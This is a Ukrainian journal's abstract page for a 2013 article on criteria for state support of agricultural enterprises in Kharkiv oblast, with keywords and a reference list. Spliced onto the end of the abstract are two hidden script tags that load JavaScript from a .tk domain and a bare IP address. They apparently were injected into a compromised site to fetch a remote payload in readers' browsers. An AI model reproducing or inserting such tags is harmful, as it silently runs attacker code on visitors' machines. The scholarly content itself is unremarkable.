ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.155(477)
Фінансові відносини та бухгалтерський облік

Критерії державної підтримки сільськогосподарських підприємств / Калашнікова Т. В. // Економіка АПК. - 2013. - № 2 - С. 49

Визначено рівень державної підтримки сільськогосподарський підприємств Харківської області. Проаналізовано вплив підтримки сільськогосподарських підприємств на показники їх діяльності. Узагальнено підходи до визначення критеріїв державної підтримки сільськогосподарських підпри­ємств. Обґрунтовано авторський підхід до визначення критерію державної підтримки підприємств з огляду на стратегічні завдання розвитку аграрної галузі. Табл.: 5. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: державна підтримка, критерій, сільськогосподарські підприємства

Список використаних джерел

  1. Державна політика фінансової підтримки розвитку аграрного сектору АПК: монографія [Дем’яненко М.Я., Саблук П.Т., Скупий В.М. та ін.]; заред. М.Я. Дем’яненка. - К.: ННЦ ІАЕ, 2011. - 372 с.
  2. Державна підтримка агросфери: еволюція, проблеми/ Бородіна О.М., Киризюк С.В., Попова О.Л. та ін.; за ред. О.М. Бородіної. - Ін-т екон. та прогнозув. НАНУ. - К., 2008. - 264 с.
  3. Діброва А.Д. Державне регулювання сільськогосподарського виробництва: теорія, методологія, практика / А.Д. Діброва. - К.:ВРД «Формат», 2008. - 488 с.
  4. Малік М.Й. Конкурентоспроможність аграрних підприємств: методологія і механізми: монографія / М.И. Малік, О.А. Нужна - К.: ННЦ ІАЕ, 2007. - С. 215.
  5. НелепВ.М. Планування на аграрному підприємстві: підруч. / В.М. Нелеп. - К.: КНЕУ, 2004. - 195 с.
  6. Олійник О.В. Новий підхід до встановлення заставних цін на зерновому ринку / О.В. Олійник // Агроінком. - 2007. - № 7-8. - С. 7.
  7. Присяжнюк М.В. Виступ на Міжнародній науково-практичній конференції «Стратегічні орієнтири розвитку аграрного сектору України до 2020 року» / М.В. Присяжнюк // Економіка АПК. - 2012. - № 10. - С. 5.
  8. Саблук П.Т. Основи організації сільськогосподарського ринку / П.Т. Саблук, Д.Я. Карич, Ю.С. Коваленко. - К.: ДОП ІАЕ УААН, - С.114.
  9. Шолойко А.С. Тенденції державної підтримки сільського господарства / А.С. Шолойко // Економіка АПК. - 2012. - № 5. - С. 41-44.
  10. OECD’s Producer Support Estimate and related indicators of agricultural support: concepts, calculations, interpretation and use (the PSE Manual) : [Електр. ресурс]. - ttp://www.oecd.org./dataoecds/52/5/46193164.pdf.
Читати статтю: 13_02_08.pdf